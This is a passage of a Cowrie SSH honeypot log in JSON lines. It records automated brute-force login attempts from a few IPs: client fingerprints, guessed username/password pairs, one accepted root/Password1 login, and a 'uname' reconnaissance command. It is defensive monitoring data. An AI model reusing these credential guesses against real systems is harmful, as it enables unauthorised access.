{"eventid":"cowrie.login.failed","username":"thomas","password":"thomas","message":"login attempt [thomas/thomas] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:28.756123Z","src_ip":"212.227.235.229","session":"d39318deb9b9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:29.306343Z","src_ip":"212.227.125.160","session":"f06bd04818fa"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:30.023301Z","src_ip":"212.227.235.229","session":"d39318deb9b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60732,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd8cac2e29b","protocol":"ssh","message":"New connection: 212.227.125.160:60732 (1.2.3.4:22) [session: ffd8cac2e29b]","sensor":"my-vps","timestamp":"2025-08-31T04:49:32.676691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:32.677950Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:32.861159Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41080,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c53cbf742f5","protocol":"ssh","message":"New connection: 212.227.235.229:41080 (1.2.3.4:22) [session: 7c53cbf742f5]","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.361503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.362234Z","src_ip":"212.227.235.229","session":"7c53cbf742f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.413289Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.484541Z","src_ip":"212.227.235.229","session":"7c53cbf742f5"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.691318Z","src_ip":"212.227.235.229","session":"52be04f5e4aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:49:33.794908Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.795575Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.980964Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:33.982067Z","src_ip":"212.227.125.160","session":"ffd8cac2e29b"}
{"eventid":"cowrie.login.failed","username":"app","password":"12","message":"login attempt [app/12] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:34.012622Z","src_ip":"212.227.235.229","session":"7c53cbf742f5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:35.137479Z","src_ip":"212.227.235.229","session":"7c53cbf742f5"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:35.244979Z","src_ip":"212.227.235.229","session":"52be04f5e4aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53632,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae13931b5775","protocol":"ssh","message":"New connection: 212.227.235.229:53632 (1.2.3.4:22) [session: ae13931b5775]","sensor":"my-vps","timestamp":"2025-08-31T04:49:36.042183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:36.270543Z","src_ip":"212.227.235.229","session":"ae13931b5775"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:36.334925Z","src_ip":"212.227.235.229","session":"ae13931b5775"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:39.943476Z","src_ip":"212.227.235.229","session":"ae13931b5775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56214,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c66cf28133a","protocol":"ssh","message":"New connection: 212.227.235.229:56214 (1.2.3.4:22) [session: 4c66cf28133a]","sensor":"my-vps","timestamp":"2025-08-31T04:49:40.867608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:40.899039Z","src_ip":"212.227.235.229","session":"4c66cf28133a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:41.118308Z","src_ip":"212.227.235.229","session":"4c66cf28133a"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:42.203252Z","src_ip":"212.227.235.229","session":"ae13931b5775"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin","message":"login attempt [test/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:43.232791Z","src_ip":"212.227.235.229","session":"4c66cf28133a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:44.975063Z","src_ip":"212.227.235.229","session":"4c66cf28133a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51776,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc47a4c4a48","protocol":"ssh","message":"New connection: 217.72.205.35:51776 (1.2.3.4:22) [session: 6bc47a4c4a48]","sensor":"my-vps","timestamp":"2025-08-31T04:49:45.386110Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:45.387591Z","src_ip":"217.72.205.35","session":"6bc47a4c4a48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56222,"dst_ip":"1.2.3.4","dst_port":22,"session":"01019dee749f","protocol":"ssh","message":"New connection: 212.227.235.229:56222 (1.2.3.4:22) [session: 01019dee749f]","sensor":"my-vps","timestamp":"2025-08-31T04:49:46.294049Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54126,"dst_ip":"1.2.3.4","dst_port":22,"session":"f43689ddd1cc","protocol":"ssh","message":"New connection: 212.227.125.160:54126 (1.2.3.4:22) [session: f43689ddd1cc]","sensor":"my-vps","timestamp":"2025-08-31T04:49:46.522981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:46.629204Z","src_ip":"212.227.235.229","session":"01019dee749f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:46.668994Z","src_ip":"212.227.235.229","session":"01019dee749f"}
{"eventid":"cowrie.login.failed","username":"newadmin","password":"newadmin","message":"login attempt [newadmin/newadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:48.085593Z","src_ip":"212.227.235.229","session":"01019dee749f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55022,"dst_ip":"1.2.3.4","dst_port":22,"session":"516b10734b51","protocol":"ssh","message":"New connection: 212.227.125.160:55022 (1.2.3.4:22) [session: 516b10734b51]","sensor":"my-vps","timestamp":"2025-08-31T04:49:48.526972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:48.527637Z","src_ip":"212.227.125.160","session":"516b10734b51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:48.716424Z","src_ip":"212.227.125.160","session":"516b10734b51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53316,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c2adf8ada40","protocol":"ssh","message":"New connection: 212.227.235.229:53316 (1.2.3.4:22) [session: 5c2adf8ada40]","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.096952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.262576Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.263519Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.284389Z","src_ip":"212.227.125.160","session":"516b10734b51"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.399379Z","src_ip":"212.227.235.229","session":"5c2adf8ada40"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512